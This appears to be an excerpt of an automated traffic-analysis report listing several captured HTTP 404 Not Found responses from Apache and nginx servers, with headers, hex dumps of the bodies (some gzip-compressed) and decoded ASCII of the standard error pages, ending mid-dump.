        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Nov 2023 18:29:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Nov 2023 18:29:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Nov 2023 18:29:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.14.2date: Fri, 17 Nov 2023 18:29:45 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedx-request-id: d625bbea-cbb2-4495-8524-f5158d20e6b2x-runtime: 0.031355content-encoding: gzipconnection: closeData Raw: 31 33 35 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c 6b 53 db c6 bb 7f 9f 4f b1 35 73 6a 93 62 f9 42 20 81 60 3a 8e 31 84 53 02 29 38 4d fb cf 64 5c d9 5a db 2a b2 e4 4a 32 97 f6 e4 bb 9f df f3 ec ae b4 b2 31 a1 d0 f3 e2 cc 24 4c 1a 21 ed 3e f7 db ee 3e db bd ef 0e ce 3a bd df de 77 c5 24 9d 06 fb cf f6 e8 1f 11 b8 e1 b8 55 92 61 89 5e 48 d7 db 7f 26 c4 de 54 a6 ae 18 4e dc 38 91 69 ab 34 4f 47 d5 57 25 51 e3 4f a9 9f 06 72 bf 3d 4c fd 28 14 9d 28 4c e3 28 08 64 bc 2b ba 37 43 39 e3 b7 43 77 3e 9e a4 7b 35 35 94 26 25 e9 2d 26 e1 49 88 41 e4 dd 8a bf f9 11 bf b8 c3 cb 71 1c cd 43 af 3a 8c 82 08 50 d6 0e db f4 f3 5a 0f 30 6f 37 37 37 cd ab a9 1b 8f fd 70 57 d4 67 37 ea d5 97 67 19 e0 0d 31 db 10 51 b0 21 e6 f8 9b 7a 19 9e 11 e8 ac 8e dc a9 1f dc ee 8a 89 0c ae 64 ea 0f dd 0d 71 25 63 cf 0d f1 e0 c6 be 8b 29 89 1b 26 d5 44 c6 fe c8 60 e3 99 89 ff 97 dc 05 b9 8d 4d 83 53 88 c0 0f 65 75 22 7d 70 ba 2b 1a af 16 88 99 c5 b2 88 5c 81 68 34 72 00 d7 13 3f 95 d5 64 e6 0e 01 1b e3 ab d7 b1 3b 2b 70 84 97 ce 20 ba c9 a5 15 c5 1e 49 1a 40 44 12 05 be 27 d6 ba dd ae a1 74 e6 7a 9e 1f 8e f1 39 93 8c 10 4b c2 12 e2 da f7 d2 c9 ae d8 d9 5a a4 99 b4 2f e3 0c 5b a6 90 fa 21 7e 0c 96 5c 63 d0 55 67 ab 79 d8 7c b1 44 40 dd d9 92 53 d1 a0 ff 16 f8 99 34 32 e0 19 5d 4e 13 43 33 e8 45 a1 3a 0d 03 40 08 4b 0f 98 51 04 db 5c a2 b9 48 58 01 6a 73 6b 41 55 8e 07 63 f7 83 e4 3e 31 1f d4 e9 27 93 01 eb a1 1a bb 9e 3f 4f 76 c5 8b 5c a7 86 2d 10 9e db a7 10 9e 9f cc 02 17 a6 37 08 a2 e1 a5 01 63 14 f1 72 51 11 4e 32 9f 02 52 ee 26 99 6a 31 52 34 32 06 c8 99 98 92 41 94 a6 d1 b4 60 18 45 8a ef 22 40 bb 4d c6 be 6d b2 86 8f 25 54 bb 22 8c 42 59 10 ff da 10 2e e2 c2 1b 72 d3 81 d1 92 cf b0 35 66 24 6a 6f cd 0c b0 51 af ff d7 b2 e9 dc 61 36 4e 12 cd e3 a1 14 cf 97 ad 27 97 7c 26 a2 c5 b0 60 66 ff 6d 42 ce b2 13 1d ec d0 4f a6 dd 2c 26 c1 c2 bb 1d fa 79 80 c6 14 89 b6 0c 0b fe 68 5b 83 92 c8 1d 92 34 a4 3a 9e 8b f0 6b 08 b6 2c ff 55 2e b1 08 a1 6b 14 44 d7 bb c2 9d a7 d1 32 ed 79 3c 3d 3c 2c a8 cb f1 c3 51 94 01 cf c5 b6 e4 ad 45 6a 1c 72 a2 7e 38 9f 0e 64 6c b9 ca 72 fc 2e 4a cc 04 91 76 3b 0b e9 b9 5c e0 24 39 d6 cc 98 63 1d 52 f3 20 77 70 70 60 18 4c e5 4d 5a 75 03 7f 8c 04 c0 03 8b bc 11 91 8b bc 55 03 39 a2 10 6d 45 c5 c5 d0 bb 0c 64 77 42 02 ce 43 c2 32 9f 87 db f4 b3 3c d3 71 91 1a af 72 2a ee 4a 71 87 1d fc 29 4e 9d f8 9e 27 c3 0c 61 e6 b0 4b ee 06 c3 10 46 aa 3b af ea 3b f5 ad d7 e2 0b db b6 bb 7b e5 27 c8 29 48 7b d9 88 ed ed ed ec b3 93 c6 c8 35 d5 51 ec 4e 25 54 78 e7 18 c3 77 f6 51 47 52 83 a2 00 c3 49 64 20 87 45 84 6a 3c 86 6b 77 5b 43 76 4f 65 3f 75 07 81 91 49 16 fb 95 04 74 80 00 4f 81 3b 4b 90 0b cd 13 7d 66 38 05 18 29 a5 29 91 1a dd 2c 44 c0 66 6e 35 9e e7 dd 0f 01 b9 95 c2 a6 96 f9 02 20
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.14.2date: Fri, 17 Nov 2023 18:29:48 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedx-request-id: 6fc8b339-6fce-48b3-be50-02f78ebfa919x-runtime: 0.040695content-encoding: gzipconnection: closeData Raw: 31 34 38 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 3c 6b 73 da 46 d7 df f3 2b b6 78 9e 82 5b 23 6e be e1 18 77 08 e0 4b ec 80 83 71 9c cb 64 a8 40 0b 28 16 12 96 04 98 f4 e9 7f 7f ce 39 bb 2b ad c0 38 ae dd f7 c3 3b 93 78 d2 c8 d2 ee b9 df 76 f7 6c 0f 7f a9 b7 6a 9d 4f 97 0d 36 0a c7 ce d1 ab 43 fc 87 39 a6 3b ac a4 b8 9b c2 17 dc b4 8e 5e 31 76 38 e6 a1 c9 fa 23 d3 0f 78 58 49 4d c3 41 76 3f c5 72 f4 29 b4 43 87 1f 55 fb a1 ed b9 ac e6 b9 a1 ef 39 0e f7 0f 58 e3 be cf 27 f4 b6 6f 4e 87 a3 f0 30 27 86 e2 a4 20 5c c0 24 78 62 ac e7 59 0b f6 17 3d c2 2f 66 ff 76 e8 7b 53 d7 ca f6 3d c7 03 28 1b c7 55 fc 79 2d 07 a8 b7 a5 52 49 bd 1a 9b fe d0 76 0f 58 7e 72 2f 5e fd fd 2a 02 bc c5 26 5b cc 73 b6 d8 14 fe 86 56 84 67 00 74 66 07 e6 d8 76 16 07 6c c4 9d 19 0f ed be b9 c5 66 dc b7 4c 17 1e 4c df 36 61 4a 60 ba 41 36 e0 be 3d 50 d8 68 66 60 7f e7 07 40 6e a1 a4 70 32 e6 d8 2e cf 8e b8 0d 9c 1e b0 c2 fe 12 31 13 9f 27 91 0b 10 85 42 0c 60 3e b2 43 9e 0d 26 66 1f 60 c3 f8 ec dc 37 27 09 8e e0 a5 d1 f3 ee 63 69 79 be 85 92 06 20 2c f0 1c db 62 1b 8d 46 43 51 3a 31 2d cb 76 87 f0 39 92 0c 63 2b c2 62 6c 6e 5b e1 e8 80 95 77 96 69 46 ed 73 3f c2 16 29 24 7f 0c 3f 0a 4b ac 31 d0 55 6d a7 78 5c dc 5e 21 20 6f ec f0 31 2b e0 7f 13 fc 8c 0a 11 f0 88 2e a3 08 43 23 e8 49 a1 1a 05 05 80 31 4d 0f 30 23 09 b6 b8 42 73 92 b0 04 d4 e2 ce 92 aa 0c 0b 8c dd 76 82 c7 c4 5c cf e3 4f 24 03 d2 43 d6 37 2d 7b 1a 1c b0 ed 58 a7 8a 2d 20 3c b6 4f c6 2c 3b 98 38 26 98 5e cf f1 fa b7 0a 8c 52 c4 de b2 22 8c 60 3a 06 48 b1 9b 44 aa 85 91 ac 10 31 80 ce 44 94 f4 bc 30 f4 c6 09 c3 48 52 fc 10 01 d2 6d 22 f6 75 93 55 7c ac a0 3a 60 ae e7 f2 84 f8 37 fa e0 22 26 78 43 6c 3a 60 b4 e8 33 64 8d 11 89 d2 5b 23 03 2c e4 f3 ff 59 35 9d 07 cc c6 08 bc a9 df e7 ec b7 55 eb 89 25 1f 89 68 39 2c a8 d9 7f a9 90 b3 ea 44 f5 32 fe 44 da 8d 62 12 58 78 a3 86 3f 4f d0 98 20 51 97 61 c2 1f 75 6b 10 12 79 40 92 8a 54 c3 32 21 fc 2a 82 35 cb df 8f 25 e6 41 e8 1a 38 de fc 80 99 d3 d0 5b a5 3d 8e a7 c7 c7 09 75 19 b6 3b f0 22 e0 b1 d8 56 bc 35 49 8d 81 4e d4 75 a7 e3 1e f7 35 57 59 8d df 49 89 a9 20 52 ad 46 21 3d 96 0b 38 49 8c 35 32 66 5f 86 d4 38 c8 d5 eb 75 c5 60 c8 ef c3 ac e9 d8 43 48 00 34 30 c9 1b 12 b9 cc 5b d6 e1 03 0c d1 5a 54 5c 0e bd ab 40 0e 46 28 e0 38 24 ac f2 79 bc 8b 3f ab 33 0d 13 52 e3 2c a6 e2 a1 14 77 5c 83 3f c9 a9 23 db b2 b8 1b 21 8c 1c 76 c5 dd c0 30 98 92 6a 79 3f 5f ce ef bc 66 7f 93 6d 9b 07 33 3b 80 9c 02 69 2f 1a b1 bb bb 1b 7d 36 42 1f 72 4d 76 e0 9b 63 0e 2a 7c 70 8c e2 3b fa 28 23 a9 42 91 80 61 04 dc e1 fd 24 42 31 1e 86 4b 77 db 80 ec 1e f2 6e 68 f6 1c 25 93 28 f6 0b 09 c8 00 01 3c 39 e6 24 80 5c a8 9e f0 33 c1 49 c0 08 31 4d b1 50 e9 66 29 02 16 63 ab b1 2c eb 71 08 90 5b 31 6c 4a 99 2f 01 52 72
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.14.2date: Fri, 17 Nov 2023 18:29:51 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedx-request-id: 3087ce5f-ea80-4b14-8319-09fa6ffaf705x-runtime: 0.034245content-encoding: gzipconnection: closeData Raw: 31 42 33 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 67 93 e3 46 96 36 fa 7d 7e 05 b6 27 ee 76 6b 57 6a 78 a7 91 b4 01 c2 10 86 16 04 08 90 13 13 5a 80 b0 84 f7 66 de fd ef 37 49 96 ed 96 66 b4 d2 7b 3f dc 88 e9 8a ee 66 01 69 4e 9e 3c 2e cf 79 b2 ea 87 7f 13 b6 bc 71 da 89 50 d4 66 e9 4f 7f fa e1 f6 1f 94 3a 79 f8 e3 07 3f ff 70 7b e0 3b de 4f 7f 82 a0 1f 32 bf 75 a0 4b e4 d4 8d df fe f8 a1 6b 83 ef 98 0f 10 7c 7f d5 c6 6d ea ff c4 5d da b8 c8 21 be c8 db ba 48 53 bf fe 1e 12 c7 8b 5f de 9f 5e 9c 2e 8c da 1f e0 47 d3 5b a7 a6 9d 40 27 f0 09 82 dc c2 9b a0 bf df 3f 82 6f 9c 4b 12 d6 45 97 7b df 5d 8a b4 00 a3 fc 59 e2 6e 5f 7f 79 6a f0 fc 14 c7 f1 e7 47 99 53 87 71 fe 3d 84 94 e3 e3 d1 ff fc e9 65 e0 6f a1 f2 5b a8 48 bf 85 3a f0 b7 f5 5e e6 09 00 9d df 05 4e 16 a7 d3 f7 50 e4 a7 bd df c6 17 e7 5b a8 f7 6b cf c9 c1 07 a7 8e 1d d0 a5 71 f2 e6 bb c6 af e3 e0 79 b6 7b cf 26 9e fd ef 01 b9 28 fe 3c 27 04 a5 71 ee 7f 17 f9 31 58 e9 f7 10 ca 7c 41 4c 59 fb ef 27 7f 0c 81 a2 af 03 0c 51 dc fa df 35 a5 73 01 63 83 f6 df 0d b5 53 be 5b 11 78 f8 d9 2d c6 57 6e 15 b5 77 e3 34 18 04 6a 8a 34 f6 a0 3f 8b a2 f8 4c 69 e9 78 5e 9c 87 e0 f5 0b 67 20 e8 2b 66 41 d0 10 7b 6d f4 3d c4 92 5f d2 7c db 7d bf 7e 99 ed 65 43 10 09 7c 3d cf f2 ba 63 60 af 78 12 93 30 e2 2b 02 90 cf a4 9f 41 e8 ed df 77 eb 89 d0 97 c1 5f e8 fa 8c 81 a6 2f a3 bf 67 ea 67 f4 79 00 08 7a b3 0f a0 c7 fb 61 b1 af 68 7e 4f d8 bb 51 31 f2 8b ad fa ec 01 61 8f d3 e6 1f b1 59 40 6e 5f 2f 3c b8 ef c3 77 b5 e3 c5 5d f3 3d 44 bc ee e9 f3 b2 00 e1 af f2 09 41 5e dc 94 a9 03 44 cf 4d 8b 4b f2 3c cc f3 46 d0 5f 6e c4 e7 a6 cb c0 48 af 6a f2 b2 b5 a0 25 84 be 2c e0 a6 4c 77 4a dc a2 6d 8b ec 9d 60 bc a7 f8 97 08 78 52 9b 97 e5 bf 15 d9 e7 75 7c 35 d5 f7 50 5e e4 fe 3b f6 ff f9 02 54 c4 01 da f0 2a 3a 40 68 6f 3a 73 97 c6 17 12 9f b4 f5 45 00 51 04 f9 7f be 16 9d 5f 10 9b cf 4d d1 d5 17 1f fa 8f af a5 e7 95 f3 2f 2c fa d2 2c 3c f7 fe fb b3 c9 f9 5a 89 04 f6 f6 f5 b2 bb 2f 36 09 48 b8 c8 df be 7e c3 8e 3d 48 7c cb c3 77 fa f8 56 1a 1e 1c f9 05 4e 3e 93 fa d9 73 80 f9 7d 26 f8 8d e4 33 af 1c 2b 80 e9 0a d2 62 f8 1e 72 ba b6 f8 9a f6 57 7b 2a 49 ef b6 eb 73 9c 07 c5 cb e0 af 6c fb 4a 5b df 53 f3 f9 a6 44 3f e7 5d e6 fa f5 1b 55 f9 da 7e bf e7 d8 b3 11 e1 b8 17 93 fe ca 17 a0 24 af b3 be 08 73 fd 64 52 5f 8d 9c 20 08 cf 0b 6c fd b1 fd ce 49 e3 10 38 80 7b c3 f7 6b bb 11 f9 e5 da be 4b fd e0 66 a2 df 58 c5 2f 4d ef d7 83 7c 1f dd 18 fc 6a 12 be 5e a7 44 dd be be ee f9 d9 01 ae b1 7f a5 e2 97 5c 9c c4 83 3f ef bb 46 b1 e7 f9 f9 cb 84 2f 0a fb 95 ba 01 c1 80 9e b9 ca 32 08 8b 90 7f 81 fe e7 2e db ce f7 7d dc 00 9f 02 dc de 4b 0b 8a a2 5e 5e 7f 6e 6b e0 6b be 0b 6a 27 f3 c1 16 fe 62 9b e7 75 bf bc 7c b2 a4 cf 53 bc 1b e3 73 e3 a7 fe e5 fd 84
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 17 Nov 2023 18:30:04 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 17 Nov 2023 18:30:04 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 17 Nov 2023 18:30:06 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 